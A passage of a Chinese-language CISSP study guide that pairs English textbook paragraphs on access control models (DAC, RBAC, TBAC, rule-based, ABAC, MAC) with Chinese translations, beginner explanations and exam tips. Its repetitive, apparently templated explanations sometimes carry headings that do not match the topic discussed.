把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 06 / PDF P973

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

Chapter 1, “Security Governance Through Principles and Policies,” covers security policies in more depth. It includes detailed information on standards, procedures, and guidelines. Introducing Access Control Models The following sections describe several access control models that you should understand. As an introduction, these access control models are summarized in the following list.

The first item in the list introduces a discretionary access control and the rest of the items on the list are nondiscretionary access controls: Discretionary Access Control A key characteristic of the discretionary access control (DAC) model is that every object has an owner and the owner can grant or deny access to any other subjects. For example, if you create a file, you are the owner and can grant permissions to any other user to access the file. The New Technology File System (NTFS), used on Microsoft Windows operating systems, uses the DAC model. Role-Based Access Control A key characteristic of the role-based access control (RBAC) model is the use of roles or groups.

Instead of assigning permissions directly to users, user accounts are placed in roles and administrators assign privileges to the roles. These roles are typically identified by job functions. If a user account is assigned a role, the user is granted all the privileges assigned to that role. Microsoft Windows operating systems implement RBAC with the use of groups. Rule-Based Access Control A key characteristic of the rule-based access control model is that it applies predefined global rules to all subjects. As an example, a firewall uses rules that allow or block traffic to all users equally.

Rules within the rule-based access control model are sometimes referred to as restrictions or filters. Attribute-Based Access Control A key characteristic of the attributebased access control (ABAC) model is its use of rules that can include multiple attributes. This allows it to be much more flexible than a rule-based access control model that applies the rules to all subjects equally. Many software-defined networks (SDNs) use the ABAC model. Additionally, ABAC allows administrators to create rules within a policy using plain language

中文直译 / 整理

第1章“通过原则和策略进行安全治理”更深入地介绍了安全策略, 包括关于标准、程序和指南的详细信息。 引入访问控制模型 以下部分介绍了您应了解的几种访问控制模型。 作为入门,这些访问控制模型 总结在以下列表中。 列表中的第一项介绍的是自主访问控制,其余项均为非自 主访问控制: 自主访问控制 自主访问控制(DAC)模型的一个关键特征是每个对象都有一个 所有者,所有者可以授予或拒绝其他主体的访问权限。 例如,如果您创建了一 个文件,您就是该文件的所有者,可以授予任何其他用户访问该文件的权限。 Microsoft Windows 操作系统使用的新技术文件系统(NTFS)即采用 DAC 模型。 基于角色的访问控制 基于角色的访问控制(RBAC)模型的一个关键特征是使 用角色或组。 不是直接将权限分配给用户,而是将用户账户放入角色中,由管 理员为角色分配权限。 这些角色通常根据工作职能来标识。 如果某个用户账户 被分配了一个角色,则该用户将获得分配给该角色的所有权限。 Microsoft Windows 操作系统通过使用组来实现 RBAC。

基于规则的访问控制 基于规则的访问控制模型的一个关键特征是,它将预定义 的全局规则应用于所有主体。 例如,防火墙使用规则对所有用户同等允许或阻 止流量。 基于规则的访问控制模型中的规则有时被称为限制或过滤器。 基于属性的访问控制 基于属性的访问控制(ABAC)模型的一个关键特征是其 使用可包含多个属性的规则。 这使其比对所有主体一视同仁的基于规则的访问 控制模型更加灵活。 许多软件定义网络(SDN)使用 ABAC 模型。 此外, ABAC 允许管理员使用自然语言在策略中创建规则

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
学习单元 07 / PDF P974

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

statements such as “Allow Managers to access the WAN using a mobile device.” Mandatory Access Control A key characteristic of the mandatory access control (MAC) model is the use of labels applied to both subjects and objects. For example, if a user has a label of top secret, the user can be granted access to a top secret document. In this example, both the subject and the object have matching labels. When documented in a table, the MAC model sometimes resembles a lattice (such as one used for a climbing rosebush), so it is referred to as a lattice-based model. Risk-Based Access Control A risk-based access control model grants access after evaluating risk.

It evaluates the environment and the situation and makes dynamic risk-based decisions using policies embedded within software code. It uses machine learning to make predictive conclusions about current activity based on past activity. Discretionary Access Control A system that employs discretionary access controls allows the owner, creator, or data custodian of an object to control and define access to that object. All objects have owners, and access control is based on the discretion or decision of the owner. For example, if a user creates a new spreadsheet file, that user is both the creator of the file and the owner of the file.

As the owner, the user can modify the permissions of the file to grant or deny access to other users. Data owners can also delegate day-to-day tasks for handling data to data custodians, giving data custodians the ability to modify permissions. Identity-based access control is a subset of DAC because systems identify users based on their identity and assign resource ownership to identities. A DAC model is implemented using access control lists (ACLs) on objects. Each ACL defines the types of access granted or denied to subjects. It does not offer a centrally controlled management system because owners can alter the ACLs on their objects at will.

Access to objects is easy to change, especially when compared to the static nature of mandatory access controls. Microsoft Windows systems use the DAC model to manage files. Each file and folder has an ACL (also known as a DACL) identifying the permissions granted to any user or group, and the owner can modify permissions.

中文直译 / 整理

语句,例如“允许管理人员使用移动设备访问广域网。 ” 强制访问控制 强制访问控制(MAC)模型的一个关键特征是为主体和对象应用 标签。 例如,如果一个用户的标签为“绝密”,则该用户可被授予访问“绝密” 文档的权限。 在此示例中,主体和对象具有匹配的标签。 当以表格形式记录时, MAC 模型有时类似于一个格子(例如用于攀爬玫瑰丛的格子),因此被称为基 于格子的模型。 基于风险的访问控制 基于风险的访问控制模型在评估风险后授予访问权限。 它会 评估环境和情境,并使用嵌入在软件代码中的策略做出动态的风险决策。 它利用 机器学习,根据以往活动对当前活动做出预测性结论。 自主访问控制 采用 自主访问控制 的系统允许对象的所有者、创建者或数据管理员控制并定义 对该对象的访问权限。 所有对象都有所有者,访问控制基于所有者的自主决定。 例如,如果一个用户创建了一个新的电子表格文件,则该用户既是文件的创建 者,也是文件的所有者。 作为所有者,用户可以修改文件的权限,以授予或拒 绝其他用户的访问权限。 数据所有者还可以将日常数据处理任务委托给数据管 理员,赋予数据管理员修改权限的能力。

基于身份的访问控制是 DAC 的一个子 集,因为系统根据用户的身份识别用户,并将资源所有权分配给身份。 DAC 模型通过对象上的访问控制列表(ACL)实现。 每个 ACL 定义了授予或 拒绝给主体的访问类型。 由于所有者可以随意更改其对象上的 ACL,因此它不 提供集中式管理系统。 与强制访问控制的静态特性相比,更改对象的访问权限 更加容易。 Microsoft Windows 系统使用 DAC 模型来管理文件。 每个文件和文件夹都有一个 ACL(也称为 DACL),用于标识授予任何用户或组的权限,且所有者可以修改权 限。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

数据保管者:数据保管者按所有者要求实施备份、访问控制等保护。

数据所有者:数据所有者负责决定数据分类、访问规则和保护要求。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

Custodian 常是 IT/运维角色。

Owner 决策,Custodian 执行,User 按授权使用。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 08 / PDF P975

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Within the DAC model, every object has an owner (or data custodian), and owners have full control over the objects they own. Permissions (such as read and modify for files) are maintained in an ACL, and owners can easily change permissions. This makes the model very flexible. Nondiscretionary Access Controls The major difference between discretionary and nondiscretionary access controls is in how they are controlled and managed. Administrators centrally administer nondiscretionary access controls and can make changes that affect the entire environment. In contrast, DAC models allow owners to make their own changes, and their changes don't affect other parts of the environment.

In a nondiscretionary access control model, access does not focus on user identity. Instead, a static set of rules governing the whole environment manages access. Non-DAC systems are centrally controlled and easier to manage (although less flexible) and audit. In general, any model that isn't a discretionary access control model is a nondiscretionary model. Role-Based Access Control Systems that employ role-based access control (RBAC) define a subject's ability to access an object based on the subject's job role. Administrators often implement role-based access control using groups or roles. As an example, a bank may have loan officers, tellers, and managers.

Administrators can create a group named Loan Officers, place the user accounts of each loan officer into this group, and then assign appropriate privileges to the group, as shown in Figure 14.1. If the organization hires a new loan officer, administrators simply add the new loan officer's account into the Loan Officers group, and the new employee automatically has all the same permissions as other loan officers in this group. Administrators would take similar steps for tellers and managers.

中文直译 / 整理

在 DAC 模型中,每个对象都有一个所有者(或数据管理员),所有者对 其拥有的对象拥有完全控制权。 权限(如文件的读取和修改权限)保存在 ACL 中,所有者可以轻松更改权限。 这使得该模型非常灵活。 非自主访问控制 自主访问控制与非自主访问控制的主要区别在于它们的控制和管理方式。 管理 员集中管理非自主访问控制,并可以做出影响整个环境的更改。 相比之下, DAC模型允许所有者自行进行更改,且其更改不会影响环境的其他部分。 在非自主访问控制模型中,访问权限不以用户身份为中心。 相反,整个环境 的访问由一组静态规则管理。 非DAC系统由中央控制,更易于管理(尽管灵 活性较低)和审计。 一般来说,任何不属于自主访问控制模型的模型都属于 非自主访问控制模型。 基于角色的访问控制 采用基于角色的访问控制(RBAC)的系统,根据主体的工作角色定义其 访问对象的能力。 管理员通常使用组或角色来实现基于角色的访问控制。 例如,银行可能有贷款专员、出纳和经理。 管理员可以创建一个名为“贷款专 员”的组,将每位贷款专员的用户账户放入该组,然后为该组分配适当的权限, 如图14.1所示。

如果组织雇佣了一名新的贷款专员,管理员只需将该新员工的 账户添加到“贷款专员”组中,该新员工便会自动获得与该组其他贷款专员相 同的全部权限。 管理员对出纳和经理也会采取类似的步骤。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

角色、岗位、职责分离常对应 RBAC。

文件所有者授权、ACL 常见于 DAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 09 / PDF P976

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 14.1 Role-based access control This approach helps enforce the principle of least privilege by preventing privilege creep. Privilege creep is the tendency for users to accrue privileges over time as their roles and access needs change. Ideally, administrators revoke user privileges when users change jobs within an organization. However, when privileges are assigned to users directly, it is challenging to identify and revoke all of a user's unneeded privileges. Administrators can easily revoke unneeded privileges by simply removing the user's account from a group. As soon as an administrator removes a user from a group, the user no longer has the privileges assigned to the group. As

中文直译 / 整理

图 14.1基于角色的访问控制 这种方法有助于贯彻最小权限原则,防止权限累积。 权限累积是指随着用户 角色和访问需求的变化,用户逐渐积累过多权限的现象。 理想情况下,当用 户在组织内部调岗时,管理员应撤销其不再需要的权限。 然而,当权限直接 分配给用户时,很难识别并撤销用户所有不必要的权限。 管理员只需将用户的账户从组中移除,即可轻松撤销不必要的权限。 一旦管理 员将用户从组中移除,该用户便不再拥有该组分配的权限。 作为

小白解释

场景先行:你是公司的安全负责人,正在读第 976 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 10 / PDF P977

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

an example, if a loan officer moves to another department, administrators can simply remove the loan officer's account from the Loan Officers group. This immediately removes all the Loan Officers group privileges from the user's account. Administrators identify roles (and groups) by job descriptions or work functions. In many cases, this follows the organization's hierarchy documented in an organizational chart. Users who occupy management positions will have greater access to resources than users in a temporary job.

RBAC is useful in dynamic environments with frequent personnel changes because administrators can easily grant multiple permissions simply by adding a new user into the appropriate role. It's worth noting that users can belong to multiple roles or groups. For example, using the same bank scenario, managers might belong to the Managers role, the Loan Officers role, and the Tellers role. This allows managers access to all of the same resources that their employees can access. Microsoft operating systems implement RBAC with the use of groups. Some groups, such as the local Administrators group, are predefined.

However, administrators can create additional groups to match the job functions or roles used in an organization. A distinguishing point about the RBAC model is that subjects have access to resources through their membership in roles or groups. Roles are based on jobs or tasks, and administrators assign privileges to the role. The RBAC model is useful for enforcing the principle of least privilege because privileges can easily be revoked by removing user accounts from a role. It's easy to confuse DAC and RBAC because they can both use groups to organize users into manageable units, but they differ in their deployment and use.

In the DAC model, objects have owners and owners determine who has access. In the RBAC model, administrators determine subject privileges and assign appropriate privileges to roles or groups. In a strict RBAC model, administrators do not assign privileges to users directly but only grant privileges by adding user accounts to roles or groups.

中文直译 / 整理

示例,如果贷款专员调往其他部门,管理员只需将其账户从“贷款专员”组中 移除即可。 这将立即从该用户的账户中移除“贷款专员”组的所有权限。 管理员通过职位描述或工作职能来识别角色(和组)。 在许多情况下,这遵循 组织结构图中记录的组织层级。 担任管理职位的用户比临时岗位的用户拥有更 多的资源访问权限。 RBAC 在人员频繁变动的动态环境中非常有用,因为管理员只需将新用户添加 到适当的角色中,即可轻松授予多个权限。 需要注意的是,用户可以属于多个 角色或组。 例如,在相同的银行场景中,经理可能同时属于“经理”角色、 “贷款专员”角色和“柜员”角色。 这使得经理能够访问其员工所能访问的所 有资源。 Microsoft 操作系统通过使用组来实现 RBAC。 某些组(如本地管理员组) 是预定义的。 然而,管理员可以创建额外的组,以匹配组织中使用的职位职 能或角色。 RBAC 模型的一个显著特点是,主体通过其在角色或组中的成员身 份访问资源。 角色基于职位或任务,管理员将权限分配给角色。 RBAC 模型有助于实施最小权限原则,因为通过将用户账户从角色中移除,可以 轻松撤销权限。

由于DAC和RBAC都可以使用组将用户组织成可管理的单元,因此很容易将它 们混淆,但它们在部署和使用上有所不同。 在DAC模型中,对象拥有所有者, 所有者决定谁具有访问权限。 在RBAC模型中,管理员决定主体的权限,并将 适当的权限分配给角色或组。 在严格的RBAC模型中,管理员不直接将权限分 配给用户,而是仅通过将用户账户添加到角色或组来授予权限。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

角色、岗位、职责分离常对应 RBAC。

文件所有者授权、ACL 常见于 DAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 11 / PDF P978

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Another access control model related to RBAC is task-based access control (TBAC). TBAC is similar to RBAC, but instead of being assigned to one or more roles, each user is assigned an array of tasks. These items all relate to assigned work tasks for the person associated with a user account. Under TBAC, the focus is on controlling access by assigned tasks rather than by user identity or job roles. As an example, Microsoft Project uses TBAC. Each project has multiple tasks. The project manager assigns tasks to project team personnel. Team personnel can address their own tasks (adding comments, indicating progress, and so on), but they cannot address other tasks.

Microsoft Project handles the underlying details. Application Roles Many applications use the RBAC model because the roles reduce the overall labor cost of maintaining the application. As a simple example, WordPress is a popular web-based application used for blogging and as a content management system. WordPress includes six roles organized in a hierarchy. The roles are Subscriber, Contributor, Author, Editor, Administrator, and Super Admin. The Subscriber has the fewest privileges, and the Super Admin has the most. Each higher-level role includes all the privileges of the lower-level role(s). Subscribers can modify some elements of the look and feel of the pages within their user profiles.

Contributors can create, edit, and delete their own unpublished posts. Authors can create, edit, and publish posts. They can also edit and delete their own published posts and upload files. Editors can create, edit, and delete any posts. They can also manage website pages, including editing and deleting pages. Administrators can do anything and everything on the site, including managing underlying themes, plug-ins, and users. Rule-Based Access Control A rule-based access control model uses a set of rules, restrictions, or filters to determine what can and cannot occur on a system. It includes granting a subject access to an object, or granting the subject the ability to perform an

中文直译 / 整理

与RBAC相关的另一种访问控制模型是基于任务的访问控制(TBAC)。 TBAC类似于RBAC,但不是将用户分配给一个或多个角色,而是将每个用户分 配一组任务。 这些任务都与与用户账户关联的人员所分配的工作任务相关。 在 TBAC下,重点是通过分配的任务而非用户身份或职位角色来控制访问。 例如,Microsoft Project 使用 TBAC。 每个项目包含多个任务。 项目经理将任 务分配给项目团队成员。 团队成员可以处理自己的任务(添加评论、指示进度 等),但不能处理其他任务。 Microsoft Project 处理底层细节。 应用程序角色 许多应用程序使用 RBAC 模型,因为角色降低了维护应用程序的整体人工 成本。 一个简单的例子是 WordPress,它是一种流行的基于 Web 的应用 程序,用于博客和内容管理系统。 WordPress 包含六个按层次结构组织的角色。 这些角色分别是订阅者、贡 献者、作者、编辑、管理员和超级管理员。 订阅者的权限最少,超级管理 员的权限最多。 每个高级别角色都包含所有低级别角色的权限。 订阅者可以修改其用户个人资料中页面的某些外观和感觉元素。

贡献者可 以创建、编辑和删除自己的未发布文章。 作者可以创建、编辑和发布文章, 还可以编辑和删除自己的已发布文章并上传文件。 编辑可以创建、编辑和 删除任何文章,还可以管理网站页面,包括编辑和删除页面。 管理员可以 执行网站上的任何操作,包括管理底层主题、插件和用户。 基于规则的访问控制 一种基于规则的访问控制模型使用一组规则、限制或过滤器来确定系统上哪些操作可以 发生,哪些不可以发生。 它包括授予主体对对象的访问权限,或授予主体执行一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

角色、岗位、职责分离常对应 RBAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 12 / PDF P979

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

action. A distinctive characteristic about rule based access control models is that they have global rules that apply to all subjects. You may see role-based access control and rule-based access control both abbreviated as RBAC in some other documents. However, the CISSP Content Outline lists them as role-based access control (RBAC) and rule-based access control. One common example of a rule-based access control model is a firewall. Firewalls include a set of rules or filters within an ACL, defined by an administrator. The firewall examines all the traffic going through it and only allows traffic that meets one of the rules.

Firewalls include a final rule (referred to as the implicit deny rule), denying or blocking all other traffic. The initial rules identify traffic that the firewall will allow. The implicit deny rule denies all other traffic. As an example, the last rule might be deny all to indicate the firewall should block all traffic in or out of the network that wasn't previously allowed by another rule. In other words, if traffic doesn't meet the condition of any previous explicitly defined rule that granted access, then the final rule ensures that the traffic is blocked. This final rule is sometimes viewable in the ACL so that you can see it.

Other times, the implicit deny rule is implied as the final rule but is not explicitly stated in the ACL. Attribute-Based Access Control Traditional rule-based access control models include global rules that apply to all subjects (such as users) equally. However, an advanced implementation of a rule-based access control is an attribute-based access control (ABAC) model. ABAC models use policies that include multiple attributes for rules. Attributes can be almost any characteristic of users, the network, and devices on the network. For example, user attributes can include group membership, the department where they work, and devices they use such as desktop PCs or mobile devices.

The network can be the local internal network, a wireless network, an intranet, or a wide area network (WAN). Devices can include firewalls, proxy servers, web servers, database servers, and more.

中文直译 / 整理

操作。 基于规则的访问控制模型的一个显著特征是,它们具有适用于所有主体的 全局规则。 在其他一些文档中,您可能会看到基于角色的访问控制和基于规则的 访问控制都缩写为 RBAC。 然而,CISSP 内容大纲将它们列为基于角色的 访问控制(RBAC)和基于规则的访问控制。 基于规则的访问控制模型的一个常见示例是防火墙。 防火墙包含一组由管理员 定义的规则或过滤器,这些规则或过滤器位于访问控制列表(ACL)中。 防火 墙会检查所有经过它的流量,仅允许满足其中任一规则的流量。 防火墙包含一条最终规则(称为隐式拒绝规则),用于拒绝或阻止所有其他 流量。 初始规则用于标识防火墙将允许的流量。 隐式拒绝规则则拒绝所有其 他流量。 例如,最后一条规则可能是 deny all,以指示防火墙应阻止所有未 被其他规则先前允许的进出网络的流量。 换句话说,如果流量不满足任何先前明确定义的授权规则的条件,则最终规则 确保该流量被阻止。 这条最终规则有时可以在 ACL 中查看到,以便您能够看 到它。 其他时候,隐式拒绝规则作为最终规则被隐含,但在 ACL 中并未明确 列出。

基于属性的访问控制 传统的基于规则的访问控制模型包括适用于所有主体(如用户)的全局规则。 然而,一种更高级的基于规则的访问控制实现是基于属性的访问控制(ABAC) 模型。 ABAC 模型使用包含多个属性的策略来定义规则。 属性可以是用户、网络和网络上设备的几乎任何特征。 例如,用户属性可以包 括组成员身份、所在部门以及使用的设备,如台式机或移动设备。 网络可以是 本地内部网络、无线网络、内网或广域网(WAN)。 设备可以包括防火墙、代 理服务器、Web服务器、数据库服务器等。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

